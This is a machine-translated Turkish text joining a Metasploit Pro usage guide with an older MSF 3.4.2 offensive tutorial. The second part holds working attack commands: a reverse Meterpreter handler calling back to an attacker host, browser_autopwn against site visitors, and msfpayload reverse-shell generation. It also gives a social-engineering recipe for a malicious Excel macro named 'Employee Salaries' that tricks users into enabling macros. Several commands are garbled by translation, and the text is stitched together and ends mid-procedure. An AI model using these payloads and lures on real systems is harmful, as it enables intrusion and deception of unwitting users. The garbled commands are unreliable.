Örneğin İK departmanı için bir proje, BT departmanı için ise başka bir proje oluşturabilirsiniz. Bu departmanlara yönelik gereksinimleriniz çok farklı olabilir, bu nedenle hedefleri farklı projelere dağıtmak mantıklıdır. Karşılaştırma yapmak ve bulgularınızı kuruluşla paylaşmak için her departman için ayrı raporlar oluşturabilirsiniz.

Bir proje oluşturmak basittir. Düğmeye basabilirsiniz Yeni proje projeler sayfasında veya seçin Proje > Yeni Proje ana araç çubuğunda.

Yeni Projeler sayfası göründüğünde tek yapmanız gereken bir isim vermektir. Projeyi özelleştirmek istiyorsanız bir açıklama ekleyebilir, ağ aralığını belirtebilir ve ayrıca kullanıcı erişim düzeyi atayabilirsiniz.

Projeler hakkında daha fazla bilgi edinmek ister misiniz?

Misafirlerden gizlendi

.

Hedef verileri alınıyor

Yapılacak bir sonraki şey projeye veri eklemek. Bunu yapmanın birkaç yolu vardır:

  • Ayrıntılı bir tarama çalıştırın.
  • Zaten sahip olduğunuz verileri içe aktarın.
Tarama hedefleri

Tarama, ağ üzerinde çalışan hizmetlerin görünürlüğünü kazanmak için ana bilgisayarları inceleme ve açık bağlantı noktalarını listeleme işlemidir. Tarama, iletişim kurabileceğiniz hizmetlere sahip etkin sistemleri tanımlamanıza olanak tanır. Bu, etkili bir saldırı planı geliştirmenize olanak tanır.

Metasploit'in, TCP bağlantı noktası taramaları gerçekleştirmek ve hedef ana bilgisayarlar hakkında ek bilgi toplamak için Nmap'i kullanan kendi yerleşik, konuşlandırılmış tarayıcısı vardır.

Varsayılan olarak, araştırma işlemi, UDP araştırmalarını NETBIOS, DHCP, DNS ve SNMP gibi en iyi bilinen UDP bağlantı noktalarına gönderen bir UDP taraması içerir. Tarama, genellikle harici hizmetler tarafından kullanılan yaklaşık 250 bağlantı noktasını kontrol eder.

Tarama işlemi sırasında Metasploit Pro, ana bilgisayar verilerini projeye otomatik olarak kaydeder. Ağ topolojisini daha iyi anlamak ve her hedef için en iyi kullanımı belirlemek için ana bilgisayar verilerini görüntüleyebilirsiniz. Bir hedef hakkında ne kadar çok bilgi toplarsanız, testi ona göre o kadar doğru şekilde uyarlayabilirsiniz.

Teste başlamak zor bir süreç değildir. Proje içinde düğmeye tıklayın Tara.

Yeni Dağıtılan Tarama formu göründüğünde, taramak istediğiniz ana bilgisayarları " Hedef adresler" Tek bir IP adresi, bir IP aralığı veya standart bir CIDR girişi girebilirsiniz. Her öğe yeni bir satırda görünmelidir.

Taramayı yalnızca tek bir hedef aralıkla başlatabilirsiniz. Ancak taramanızı daha detaylı şekilde özelleştirmek istiyorsanız gelişmiş seçenekleri kullanabilirsiniz. Örneğin, taramanın dışında bırakmak istediğiniz ana bilgisayarları belirtebilir ve tarama hızını ayarlayabilirsiniz.

Ayrıntılı tarama hakkında daha fazla bilgi edinmek ister misiniz? Git

Misafirlerden gizlendi

.

Verileri içe aktar

Eğer bir zafiyet tarayıcısı kullanıyorsanız, zafiyet raporunu Metasploit projesine aktarabilirsiniz. İçe aktarılan güvenlik açığı verileri aynı zamanda ek saldırı yollarını belirlemek için analiz edilebilecek ana bilgisayar meta verilerini de içerir. Metasploit, Nessus, Qualys ve Core Impact dahil olmak üzere çeşitli güvenlik açığı tarayıcılarını destekler.

Ayrıca bir Metasploit projesinden diğerine veri aktarabilir ve alabilirsiniz. Bu, sonuçları projeler ve diğer ekip üyeleri arasında paylaşmanıza olanak tanır.

Projenize veri aktarmak için İçe Aktar düğmesine tıklayın. Veri içe aktarma sayfası göründüğünde, NeXpose'tan içe aktarmayı veya dosyadan içe aktarmayı seçin. Seçtiğiniz seçeneğe bağlı olarak form, dosyayı içe aktarmak için yapılandırmanız gereken seçenekleri görüntüler.

Örneğin, NeXpose'tan içe aktarmak istiyorsanız, taramayı çalıştırmak veya siteyi içe aktarmak için kullanmak istediğiniz konsolu seçmeniz gerekir. Bir dosyayı içe aktarmak istiyorsanız dosya konumuna gitmeniz gerekir.
Kullanılabilir içe aktarma türlerinin tam listesini görmek ve içe aktarma hakkında daha fazla bilgi edinmek için şu adrese gidin:

Misafirlerden gizlendi

.

Ana makine verilerini görüntüleyin ve yönetin

Ana bilgisayar verilerini proje düzeyinde veya ana bilgisayar düzeyinde görüntüleyebilirsiniz. Proje düzeyinde Metasploit, projeye eklenen tüm ana bilgisayarların bir görünümünü sağlar.

Proje düzeyinde görüntülemeye erişmek için Analiz > Ana Bilgisayarlar.

Proje düzeyinde görünüm başlangıçta her ana bilgisayar için bağlantı noktası ve hizmet sayısını içeren bir ana bilgisayar listesi gösterir. Ayrıca bir projeye ilişkin tüm kayıtları, hizmetleri, güvenlik açıklarını ve alınan verileri de görüntüleyebilirsiniz. Onlara erişmek için sekmelerine tıklayın.

Bir ana bilgisayarın ayrıntılı ayrıntılarını görüntülemek için Ana Bilgisayar IP Adresi düğmesini tıklamanız gerekir. Bu, belirli bir ana bilgisayarın güvenlik açıklarını ve kimlik bilgilerini görmenin iyi bir yoludur.

Güvenlik açığı taraması çalıştırın

Projenize hedef verileri ekledikten sonra, kötüye kullanılabilecek güvenlik kusurlarını belirlemek için bir güvenlik açığı taraması çalıştırabilirsiniz. Tarayıcılar, hedef makinelerde bilinen güvenlik açıklarını ve yapılandırma hatalarını kontrol eder. Bu bilgi olası saldırı yönlerini ve planlarını belirlemenize yardımcı olacaktır.
NeXpose ile entegrasyon, güvenlik açığı taramalarını doğrudan Metasploit web arayüzünden çalıştırmanıza olanak tanır. NeXpose taraması, her ana bilgisayarda çalışan aktif hizmetleri, açık bağlantı noktalarını ve uygulamaları tanımlar; NeXpose, bilinen hizmet ve uygulamalara dayalı olarak mevcut olabilecek güvenlik açıklarını belirlemeye çalışır.
NeXpose taramasını başlatmak için düğmeye tıklayın NeXpose görev çubuğunda bulunur.

NeXpose ayarları formu göründüğünde, taramayı gerçekleştirmek için kullanmak istediğiniz konsolu yapılandırmanız ve seçmeniz gerekir. Ayrıca, taranacak ana bilgisayarları tanımlamanız ve kullanılacak denetim düzeyini belirleyen mevcut tarama şablonlarından birini seçmeniz gerekir. Tarama desenleri hakkında daha fazla bilgi için bkz.

Misafirlerden gizlendi

.

NeXpose'un bulduğu tüm potansiyel güvenlik açıklarını görüntülemek için Analiz > Güvenlik Açıkları. Bir güvenlik açığını bulmak için kullanılan modülleri görüntülemek için bir güvenlik açığının adına tıklayabilirsiniz.

Önemli bilgi: çalıştırma.

Güvenlik açığı tarayıcıları, potansiyel güvenlik kusurlarını hızlı bir şekilde bulmanıza yardımcı olabilecek kullanışlı araçlardır. Ancak istismar edilebilecek potansiyel güvenlik açıklarını manuel olarak belirlemek için FTP, SMB ve VNC gibi bazı yardımcı modülleri çalıştırabilirsiniz. Manuel güvenlik açığı analizi önemli ölçüde daha fazla zaman alır ve sizin açınızdan eleştirel düşünmenin yanı sıra derinlemesine bilgi gerektirir, ancak doğru ve etkili bir saldırı planı oluşturmanıza yardımcı olacaktır.​

Güvenlik açıklarını bulmanın ve bunlardan yararlanmanın kolay bir yolu

Güvenlik açıklarını taramanın ve doğrulamanın en kolay yolu, NeXpose ve Metasploit Pro kullanıcıları için tarama sürecini otomatikleştiren tarama sihirbazıdır. Sihirbaz, NeXpose verilerinin içe aktarılmasından güvenlik açıklarından otomatik olarak yararlanılarak doğrulama sonuçlarının NeXpose'a geri gönderilmesine kadar doğrulama süreci boyunca size rehberlik edecek rehberli, kullanıcı dostu bir arayüz sağlar.

NeXpose ve/veya Metasploit Pro'ya erişiminiz yoksa, doğrulama için manuel bir güvenlik açığı analizi yapılması gerekecektir. Manuel tarama biraz daha fazla çaba gerektirir ancak güvenlik açıkları üzerinde çok daha fazla kontrol sağlar.
Güvenlik açığı taraması hakkında daha fazla bilgi edinmek için şu adrese gidin:

Misafirlerden gizlendi

.

Bilinen güvenlik açıklarından yararlanma

Hedefleriniz hakkında bilgi topladıktan ve potansiyel güvenlik açıklarını belirledikten sonra yararlanma aşamasına geçebilirsiniz. Suistimal, keşfedilen güvenlik açıklarına karşı istismar başlatma sürecidir. Başarılı bir şekilde yararlanma, hedef sistemlere erişim sağlar, böylece parola karmalarını ve yapılandırma dosyalarını alabilirsiniz.

Metasploit, sömürü için kullanılabilecek birkaç farklı yöntem sunar: otomatik yararlanma ve manuel yararlanma.

Otomatik çalışma

Otomatik istismar, ilgili istismarları bulmak için çapraz referansları, açık hizmetleri ve savunmasız bağlantıları kullanır. Tüm açıklardan yararlanmalar, başlatılacak açıkları belirleyen saldırı planına eklenir. Otomatik istismarın özelliği, Metasploit'in hedef ana bilgisayarlar için sahip olduğu verileri kullanarak oturumu mümkün olan en kısa sürede sonlandırmaktır.

Otomatik çalışmayı başlatmak için düğmeye basın Sömürü görev çubuğunda bulunur.

Yararlanmak istediğiniz ana bilgisayarları ve her bir yararlanma için minimum güvenilirliği sağlamalısınız. Çalışan güvenlik açıklarının güvenli olmasını sağlamak için minimum güvenilirlik ayarlanabilir. Güvenilirlik düzeyi ne kadar yüksek olursa, açıklardan yararlanmanın kötü amaçlı hizmetler tarafından kullanılma olasılığı da o kadar az olur. Her modülün açıklamaları için bu sayfaya gidin.

Manuel işlem

Manuel yararlanma, güvenlik açıklarından yararlanmaya yönelik daha odaklı ve metodik bir yaklaşım sağlar. Onun yardımıyla seçilen istismarları birer birer başlatabilirsiniz. Bu yöntem özellikle yararlanmak istediğiniz belirli bir güvenlik açığı varsa kullanışlıdır.

Örneğin, Windows XP'deki SMB sunucusunun MS08-067 yamasına sahip olmadığını biliyorsanız, onu kullanmak için ilgili modülü çalıştırmayı deneyebilirsiniz.

Modülleri aramak için Modüller > Ara ve çalıştırmak istediğiniz modülün adını girin. Bir modülü bulmanın en iyi yolu güvenlik açığı bağlantısını aramaktır. Örneğin 08-067 numaralı formları aramak istiyorsanız 'ms08-067' şeklinde arama yapabilirsiniz. Ayrıca modül yoluna göre de arama yapabilirsiniz: istismar/windows/smb/ms08_067_netapi.

Bir güvenlik açığından yararlanmayı bulmanın en kolay ve en uygun yollarından biri doğrudan güvenlik açığı sayfasındadır. Bir projedeki tüm güvenlik açıklarını görüntülemek için Analiz > Güvenlik Açıkları. Bir güvenlik açığından yararlanmak için kullanılabilecek ilgili modülleri görüntülemek için bir güvenlik açığının adına tıklayabilirsiniz.

Ayrı bir güvenlik açığı türü, ana bilgisayara karşı kullanılabilecek açıkların bir listesini gösterir. Düğmeye basabilirsiniz Kullanmak Modül ayarları sayfasını açmak için.

Genel modül ayarları

Her modülün ihtiyaçlarınıza uyacak şekilde özelleştirilebilecek kendi seçenekleri vardır. O kadar çok olasılık var ki hepsini burada listelemek imkansız. Ancak aşağıda modülleri yapılandırmak için yaygın olarak kullanılan birkaç seçenek verilmiştir:

  • Payload Type: İstismarın hedefe ileteceği yükün türünü belirler. Aşağıdaki yük türlerinden birini seçin:
  • Komut: Komutu yürüten yük. Uzak bir bilgisayarda komutları yürütmek için kullanılabilir.
  • Meterpreter: Komutları iletebileceğiniz ve uzantıları uygulayabileceğiniz bir komut satırı sağlayan aşamalı bir veri yükü.
  • Bağlantı Türü: Metasploit'in hedefe nasıl bağlanacağını belirler. Aşağıdaki bağlantı türlerinden birini seçin:
  • Otomatik: Otomatik bağlantı, NAT algılanırsa ilgili bağlantıyı kullanır; aksi takdirde geri bildirim kullanılır.
  • Bağlantılı: Zincirleme bir bağlantı kullanılır; bu, hedefin bir güvenlik duvarı veya NAT ağ geçidi içinde olmaması durumunda özellikle önemlidir.
  • Tersine: Sisteminizin hedeflerle bağlantı kuramaması durumunda özellikle önemli olan geri bildirimi kullanır.
  • LHOST: Yerel ana bilgisayar adresini belirtir.
  • LPORT: Geri döngüler için kullanmak istediğiniz bağlantı noktalarını belirtir.
  • RHOST: Hedef adresi belirtir.
  • RPORT: Saldırmak istediğiniz uzak bağlantı noktasını belirtir.
  • Hedef Ayarları: Hedef işletim sistemini ve sürümünü belirtir.
  • Exploit Timeout: Birkaç dakikalık bir zaman aşımı tanımlar.
Operasyon sonrası ve veri toplama

Açık bir oturumda güvenlik açıklarının sonuçlarından başarıyla yararlanan herhangi bir istismar, hedeften bilgi çıkarmak için kullanılabilir. Saldırının gerçek etkisi, hedeften elde edebileceğiniz verilere (örn. şifre karmaları, sistem dosyaları) ve bu verileri ek sistemlere erişim sağlamak için nasıl kullanacağınıza bağlıdır.
Açık oturumların listesini görüntülemek için sekmeyi seçin Oturumlar (Oturumlar). Ana makineye karşı başlatılabilecek kullanım sonrası görevleri görüntülemek için bir oturum kimliğine tıklayın.

İşletim sisteminden veri toplamak için düğmeye tıklayın TOPLAMAK.

Tüm açık oturumların listesi toplanabilecek veri türünü gösterir.

Oturumları temizleme

Açık bir oturumla işiniz bittiğinde, oturumu kapatmadan önce oturumu temizleyebilirsiniz. Bu, sistemde bırakılabilecek tüm kanıtları ortadan kaldıracaktır. Oturumunuzu temizlemek için şuraya gidin: Oturumlar ve düğmeye basın Temizlemek (Temizlemek).

Oturumu temizle sayfası göründüğünde kapatmak istediğiniz oturumları seçin ve ardından düğmeye tıklayın. Temizlemek
Oturumlar
.

Rapor oluştur

Sızma testi sonunda rapor oluşturabilirsiniz. Metasploit, test sonuçlarını derlemek ve verileri birleştirmek için kullanılabilecek çeşitli rapor türleri sağlar. Her rapor, bulgularını uygun bölümler halinde düzenler, istatistiksel veriler için çizelgeler ve grafikler görüntüler ve önemli bulguları özetler.
Raporlar hakkında daha fazla bilgi edinmek için şu adrese gidin:

Misafirlerden gizlendi

.

Ek kaynaklar

Pek çok bilgiyi inceledik. Belirli konuları daha detaylı incelemek isterseniz lütfen iletişime geçin.

Misafirlerden gizlendi

.

Artık Metasploit Pro'da ortak görevleri nasıl gerçekleştireceğinizi bildiğinize göre kullanabileceğiniz diğer seçeneklere göz atın:

  • Görevleri otomatikleştirmek istiyor musunuz? Zincir problemlerine alışın.
  • Kaba kuvvet saldırısıyla ilgileniyor musunuz?

    Misafirlerden gizlendi

    .
  • Bir güvenlik farkındalığı programı başlatmak ister misiniz?

    Misafirlerden gizlendi

    Bir sosyal mühendislik kampanyası nasıl oluşturulur?

  • Komut satırını mı tercih ediyorsunuz?

    Misafirlerden gizlendi

    .
  • Çerçevelerle ilgileniyor musunuz?

    Misafirlerden gizlendi

    .

7 yıl önce doğan MSF, daha sonra, çalışan yazılımların yazılmasına yönelik basit bir çerçeveden, önce bir tür “İsviçre bıçağına”, şimdi de bilgi toplamaktan gelişmiş veri toplama yöntemlerine kadar gerekli her şeyi içeren, sızma testleri yürütmek için tam bir atölyeye dönüştü. sömürü sonrası. MSF'nin en çok kullanılan beş araçtan biri olması boşuna değil. İyi haber şu ki MSF büyümeye ve gelişmeye devam ediyor! Ve hangi yönde - bu makaleden öğreneceksiniz.

Başlangıçta makalenin MSF'deki eylemleri otomatikleştirme olanaklarını tanımlaması gerekiyordu, ancak insanların çerçeve hakkındaki bilgileri analiz edildikten sonra, az çok gelişmiş yerleşik yetenekleri hakkında konuşmaya karar verildi ve bunların otomasyonu yol boyunca tartışılacak. . Böylece insanlar tekerleği yeniden icat etmesinler :).

Bu arada, bilgi hakkında. Metasploit hakkında İngilizce bile kapsamlı makaleler/kitaplar bulunmadığı için bunların çok fazla olmaması şaşırtıcı değil. Yani ana bilgi kaynakları yabancı bloglar ve kişisel araştırmalardır. Ayrıca Ruby'nin basit bir şey olmasına ve başkalarının örneklerini kullanarak yararlı bir şeyler yapabilmenize sevindim.
Ama asıl noktaya! Açıklanan her şey en son sürüm olan MSF 3.4.2 ile ilgilidir.

GUI geri döndü!

Konsolu sevmeyenler veya MSF komutlarıyla uğraşamayacak kadar tembel olanlar için GTK tabanlı bir GUI kabuğu var. Daha doğrusu, 3.3 sürümünde terk edildiği için mevcuttu. Yanılmıyorsam aynı şey msfweb'de de oldu. Yani hâlâ kullanabilirsiniz ama yine de istikrarla ilgili sorunlar vardı, ama işte... eh!

Ancak makaleyi hazırlarken iyi bir şey oldu: yeni bir yapışkan kabuk. Hem dışını hem de içini değiştirdi. Daha doğrusu Java ile yazılmıştır, dolayısıyla çapraz platformdur ve ayrıca XMLRPC arayüzü üzerinden MSF ile etkileşime girer, yani uzaktan kullanılabilir.

GUI'nin başlatılması iki aşamada gerçekleştirilir: msfrpcd'yi başlatın, ona msfgui aracılığıyla bağlanın. Niks altında, msfgui'yi başlattıktan sonra "yeni msfprcd'yi başlat"a tıklamanız yeterlidir.

Sürümü kazan:

  1. Cygwin konsolunu başlatın
  2. cd /msf3
  3. msfrpcd -S -U kullanıcı adı -P şifre burada –S – SSL'yi devre dışı bırakır ve oturum açma/şifreyi icat eder
  4. %MSF%\msf3\data\gui içinde saklanan msfgui.jar'ı çift tıklatarak veya konsolda (cygwin'de değil) çalıştırın: java –jar msfgui.jar

Msfgui'de oturum açma/geçiş, bağlantı noktası, IP ve bağlantı bilgilerini giriyoruz.

Eski gui ile karşılaştırıldığında bile bir şeyler eksik. Örneğin, konsola erişmek veya günlükleri görüntülemek. Ancak, özellikle eklentileri, modülleri hızlı bir şekilde gözden geçirmeniz, başka birinin bilgisayarında gezinmeniz vb. gerekiyorsa çalışabilirsiniz.

Bilgi toplanması

MSF'nin bilgi depolamak ve modüller arasında bilgi alışverişi yapmak için bir veritabanıyla çalıştığını bilmelisiniz. Ve bu yön aktif olarak gelişiyor.

Yeni başlayanlar için tam olarak desteklenen tek veritabanı PostgreSQL'dir. Performans/ölçeklenebilirlik sorunları nedeniyle SQLite terk edildi ve MySQL'de de bazı şeyler yolunda gitmedi. Genel olarak Postgres'in yüklenmesi sorun yaratmayacaktır. Etkileşim sürücüsü MSF'de yerleşiktir.

Win: install altında, kullanıcı için geçişi (postgres ve port) ayarlayın.

pgAdmin aracılığıyla: yerel sunucuya bağlanın, başka bir “Giriş Rolü” kullanıcısı (msf_user) oluşturun, “Bazlarda” (msf_db) bir veritabanı oluşturun. Burada SQL sunucusunun kendisini yapılandırabilir, onu "daha güvenli" hale getirebilir ve hatta MSF tablolarında gezinebilirsiniz.

msf> db_driver postgresql
msf> db_connect msf_user: [e-posta korumalı]:5432/msf_db

Artık db_create komutu doğrudan çalışmıyor, yalnızca mevcut bir veritabanına bağlanabilirsiniz ve uygun haklara sahipseniz (postgres kullanıcısı gibi) veritabanı otomatik olarak oluşturulacaktır. Aksi takdirde veritabanını Postgres'te manuel olarak oluşturun.

Ancak bu o kadar da korkutucu değil çünkü çalışma alanlarını kullanabilirsiniz. Bir veritabanı var, tablolar aynı, ancak modüller yalnızca geçerli alanda bilgi alışverişinde bulunuyor/ekliyor. Eğer denerseniz db_workspace'in size yardımcı olacağını anlayacaksınız.

Komutlara daha yakından bakalım:

  • db_service – modüller, yerleşik nmap tarafından taranan veya üçüncü taraf programlardan içe aktarılan bağlantı noktaları/hizmetler hakkındaki bilgileri görüntüler. Buna dayanarak db_autopwn –p parametresiyle (bağlantı noktasına göre) çalışır;
  • db_notes – Nmap'ten alınan işletim sistemi sürümü gibi “notlar” veya WMap tarafından alınan bazı “ayrıntılar”. Çok yazık ama db_autopwn bir istismar seçmek için db_notes'a bakmıyor gibi görünüyor.
  • db_vulns – MSF modülleri (WMap) tarafından bulunan veya Nessus (OpenVAS), Nexpose'dan aktarılan güvenlik açıkları. Buna dayanarak db_autopwn –x parametresi ile (açıklara göre) çalışır.

Örneğin, ana bilgisayarı nmap ile tarayalım ve sonuçlar veritabanımıza girecektir:

msf> db_nmap –PN –sV 192.168.0.101

MSF'nin port tarayıcı modülünün sonucu da benzer olacak ve veriler de veritabanına düşecek. Ancak hizmetleri tanımlamak için diğer modülleri kullanmanız gerekir (tarayıcı bölümünün sonunda "versiyon" bulunan tüm yardımcı modüller, örneğin tarayıcı/imap/imap_verison).

msf> tarayıcı/portscan/tcp kullan
msf> RHOSTS'u 192.168.0.101 olarak ayarlayın
msf> PORTLARI 1-1000 olarak ayarlayın
msf> -j'yi çalıştır

Son eylemleri ve aslında MSF'deki tüm eylemleri otomatikleştirmek için kaynak dosyalarını kullanabilirsiniz. Esasen bunlar, MSF için sıralı komut listesini içeren sıradan metin dosyalarıdır. Örneğin, ters sayaç yorumlayıcı için hızlı bir şekilde bir “sunucu” başlatmak için bir kaynak oluşturalım. Bunu yapmak için aşağıdaki komutları dosyaya (metrevhandl.rc) koyun:

istismar/çoklu/işleyiciyi kullan
PAYLOAD pencerelerini/meterpreter/reverse_tcp'yi ayarlayın
LPORT 4444'ü ayarlayın
LHOST 192.168.0.102'yi ayarlayın
–j'den yararlanın
geri

Komut dosyamızı “kaynak” kullanarak çalıştırıyoruz:

msf> kaynak metrevhandl.rc

Gördüğünüz gibi çok kullanışlı. Ama hepsi bu değil. En iyi yanı, bu komut dosyalarına Ruby kodu yazabilmenizdir; bu, örneğin bireysel MSF modülleri arasında ilişkiler kurmamıza olanak tanır.

Bu arada home/.msf3/msfconsole.rc, msfconsole başlatıldığında otomatik olarak başlatılan bir komut dosyasıdır. Örneğin bir veritabanına bağlantı göndermek çok kullanışlıdır.

Hadi gidelim...

WMAP. WMAP, MSF'yi web uygulamalarına uyarlama ve bir şekilde her şeyi otomatikleştirme girişimidir. WMAP projesi henüz başlangıç ​​aşamasında ve özellikle rakipleriyle karşılaştırıldığında pek iyi performans göstermiyor. En azından şu anki haliyle gelişmesi pek olası değil ve bunun nedeni Rapid7'nin web için özel olarak tasarlanmış açık kaynaklı w3af çerçevesini yoğun bir şekilde finanse etmeye başlamasıdır, bu nedenle dahili bileşenlerin veya işlevlerin birleşmesini bekleyebiliriz. MSF ve w3af. Ancak yine de küçük bir örnek (veritabanına bağlantı gerektirir):

1. Wmap eklentisini yükleyin:

msf> db_wmap'i yükle

2. Kurban ekleme:

msf> wmap_targets -a http://www.example.com/

3. Kurbanımıza karşı modülleri görüntüleyin ve başlatın:

msf> wmap_run -t
msf> wmap_run –e

Sonuçlar veritabanında saklanır ve db_vulns, db_notes aracılığıyla erişilebilir.

Bazı modüller ayarların yapılandırılmasını gerektirir. Bu setg komutu kullanılarak yapılabilir. WMAP ayrıca bir örümceğe (wmap_crawler) ve bir proxy ile etkileşime girme yeteneğine (wmap_proxy) sahiptir.

Ayrıca veritabanlarına her türlü enjeksiyonla işkence etmeyi sevenler için MSF modülüne - tarayıcı/http/sqlmap - bakmanızı tavsiye ederim. Bu, aynı adı taşıyan aracın (SQLmap) bağlantı noktasıdır. Bu arada, bu şey güçlü :). Araçla ilgili bilgileri yaratıcının web sitesinde bulabilirsiniz -.

db_autopwn

MSF'deki otomatik döküm birkaç yararlı parametre edinmiştir:

  • -R – kullanılacak olan istismarın minimum derecesini gösterir;
  • -m – salları seçmek için normal ifadeyi ayarlayın.

Örneğin:

msf> db_autopwn -t -p -m windows -R mükemmel

standart Win hizmetleri için yalnızca en iyi istismarların bir listesini görüntüler.

Bu arada, 3.3.1 sürümünden itibaren Nexpose ile doğrudan MFS'den çalışabilir ve belirlenen güvenlik açıklarına göre anında otomatik pavn yapabilirsiniz.

1. Eklentiyi yükleyin ve Nexpose'a bağlanın:

msf> sonraki yükle
msf> nexpose_connect msf_user: [e-posta korumalı]

2. Bulunan güvenlik açıkları için yalnızca en iyi güvenlik açıklarını başlatıyoruz:

msf> nexpose_scan -R mükemmel -x 192.168.0.101

Tarayıcı_autopwn

Eğer önceki istismar standart istismarlar için tasarlandıysa, bu da adından da anlaşılacağı üzere kurbanların tarayıcılarını hedef alan istemci istismarları için tasarlandı.
Aslında, bu modül HTTP sunucusunu yükseltir ve üzerinde tarayıcılar için tüm açıkları yükseltir. Bir kurban sunucumuzu ziyaret ettiğinde modül, tarayıcı sürümünü ve işletim sistemini algılar ve ardından uygun istismarı başlatır. Şu ana kadar modülün ana özelliği tarayıcı/işletim sistemi sürümünün doğru belirlenmesidir. Hem sunucu hem de istemci algılama yetenekleri (JavaScript) kullanılır. Yani yerine başka bir Kullanıcı Aracısı geçirerek modülü kandırmak kesinlikle mümkün olmayacaktır.

Mevcut istismarlardan, tarayıcıların eski tarz sürümleri iyi çalışır, ancak en iyi yanı, kendi istismarlarınızı kolayca ekleyebilmenizdir ve bu zaten güçlüdür. Bedava bir spoiler paketi olduğu ortaya çıktı.

Gelecek sürümlerde, açıklardan yararlanmaların gizlenmesine yönelik yetenekler (böylece antivirüs yazılımının bunları yakmaması için) ve yük seçme yetenekleri ekleme sözü veriyorlar.

Örneğin, 192.168.0.102 kabukları için geri bağlantılı bir sunucu oluşturalım:

msf> sunucu/browser_autopwn'ı kullan
msf> LHOST'u 192.168.0.102 olarak ayarlayın
msf> index.php URI'sini ayarla
msf> -j'den yararlanın

VBA

EasyHack bölümünde MSF kullanarak Truva atı oluşturmayı zaten yazmıştım ancak exe dosyalarını göndermek çok kötü. Kullanıcılar artık ürkekleştiler ve ellerine geçen her şeyi açmıyorlar, ayrıca Windows'tan da uyarılar geliyor. Bazı ofis dosyalarını kullanmak çok daha az acı vericidir:

msfpayload windows/shell_bind_tcp LPORT=5555 V > macros.vba

Daha sonra, örneğin "Çalışan Maaşları" adlı korkunç adı taşıyan bir Excel belgesi oluşturuyoruz. Daha sonra ortaya çıkan VBA'yı açıyoruz, makro metnini (MAKRO KODU) belge makrosuna (Araçlar -> Makro -> VB Düzenleyici) ve belgenin sonunda - “yükümüzü” (ÖDEME VERİLERİ) yerleştiriyoruz. Belgenin başına güzellik için bazı hesaplamalar ekleyebilirsiniz. Makrolar varsayılan olarak devre dışı olduğundan (bildiğim kadarıyla OfficeXP sürümünden), “Dikkat! Veritabanıyla çalışmak yalnızca makrolar etkinleştirildiğinde mümkündür. Bunları etkinleştirmek için “Araçlar –> Seçenekler –> Güvenlik –> Makro Koruma –> Düşük” seçeneğine gidin ve belgeyi yeniden başlatın”, kullanıcıyı makroları etkinleştirmeye zorlayabilirsiniz. Sonuç olarak kabuk 5555 numaralı bağlantı noktasındadır.

Anlamsal yük

Aslında istismarlar için veri yükünün seçimi önemli bir konudur. Ancak MSF'de bunlardan çok sayıda var, bu yüzden genel bir anlayışa sahip olmak için bunların üzerinden biraz geçeceğim (çoğunlukla Win*'de). İlk olarak, işletim sistemine göre genel bir bölümün yanı sıra yazılım ve yüklenebilir yorumlayıcılar (ruby, perl) vardır.

Açıklamaya göre genel bölüm:

  • "Satır İçi" olarak işaretlenenler "tam" kabuk kodlardır. Büyük olduklarından her zaman istismarlara uymazlar;
  • "Stager" - parçalara bölünmüş yükler. İstismar, esas olarak bağlantı kurmak için küçük bir kabuk kodu içerir, geri kalanı bağlantı sırasında yüklenir;
  • “Ord” – “keskinleştirilmiş” yükler. Boyutu küçüktür ancak sistem DLL'sinin belleğindeki statik adreslere bağlıdır;
  • “Bind” – bir bağlantı noktası açın ve bağlantıyı bekleyin;
  • “Ters” – arka bağlantı kabuğu;
  • “Findport” – istismarın çalıştığı soket için bir arama yapılır, ardından kabuk onun üzerinden açılır. Arama port numarasına göre gerçekleştirilir;
  • “Findtag” - öncekine benzer, yalnızca soket, bilgisayar korsanından 4 baytlık bir etiketin gelmesi beklentisiyle mevcut tüm olanlar dinlenerek belirlenir.;
  • “Exec, Download_exec, Up_exec” – komutu başlatmak, indirmek/indirmek ve başlatmak için kabuk kodu;
  • “VNC” – kurbanın VNC sunucusunu başlatır;
  • “dllinjection” – DLL'lerin işlem belleğine yüklenmesi. İki tür DLL enjeksiyonu vardır;
  • “metsvc” – sayaç yorumlayıcısının tamamını kurbana indirir ve onu bir hizmet olarak kaydeder;
  • “PassiveX” – kabuğumuz bir ActiveX öğesi gibi davranır.
  • “NoNX” – DEP bellek koruma mekanizmasını atlayan kabuk kodları;
  • “DNS” – IP yerine ana bilgisayar adlarıyla çalışabilenler;
  • “HTTPS”, şifrelenmiş HTTPS protokolünü kullanarak iletişim kuran bir kabuktur (üzgünüm, proxy desteği yok).

Çok iyi oldukları için biraz PassiveX'e odaklanacağım.
Sonuç olarak, kabuğumuz bir ActiveX öğesi olarak kayıtlıdır ve etkileşim, HTTP protokolünü kullanan gizli bir IE sürümü aracılığıyla gerçekleşir. Bu gerçekten harika bir şey, özellikle de herkesin NAT'ın arkasında oturduğu ve yalnızca kurumsal proxy sunucusundan gelen HTTP trafiğine izin veren ortak bir güvenlik duvarının olduğu bir tür kurumsal ağı kırarsanız. Bu durumda, özellikle proxy ayarlarını bilmiyorsanız, başka hiçbir yük yardımcı olmayacaktır. Ve burada - proxy ve kimlik doğrulama için tüm ayarlar (varsa) zaten IE'de kayıtlıdır.

Bunun için bir yük ve dinleme oluşturalım (192.168.0.102:443):

msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X > reflmeter102.exe

msf> istismar/çoklu/işleyiciyi kullan
msf> istismar -p windows/meterpreter/reverse_http -o PXHOST=192.168.0.102,PXPORT=443,PXURI=/

Üstelik PassiveX'ten önce yalnızca IE6 altında çalışıyorduysa şimdi IE7/8'de her şey yolunda.

Sırada sıradan mermiler hakkında. Normal bir kabuk elbette iyidir, ancak Meterpreter kullandıysanız, ona geri dönmek isteyeceksiniz.
Ve şimdi bu fırsata sahibiz. Kurbanımızın (192.168.0.101) 5678 numaralı bağlantı noktasına zaten normal bir bağlama kabuğunun kurulu olduğunu varsayalım.

MSF'den bağlanalım:

msf> istismar/çoklu/işleyiciyi kullan
msf> istismar -p windows/shell_bind_tcp -o RHOST=192.168.0.101,RPORT=5678

Bir sonraki komutla sıradan bir kabuğu bir ölçüm yorumlayıcısına dönüştürdüğümüzü söylemek isterim ama şans yok. MSF, Meterpreter geri bağlantısını yükler ve başlattıktan sonra başka bir oturum oluşturur (başka bir bağlantı oluşturulur). Gerçi bu da kötü değil. Ancak her şeyin işe yaraması için, ana makinemizin global değerlerini ayarlamamız (tersinin bağlandığı yer) ve ardından oturumu "güncellememiz" ("1" olduğunu varsayalım):

msf> LHOST 192.168.0.102'yi ayarla
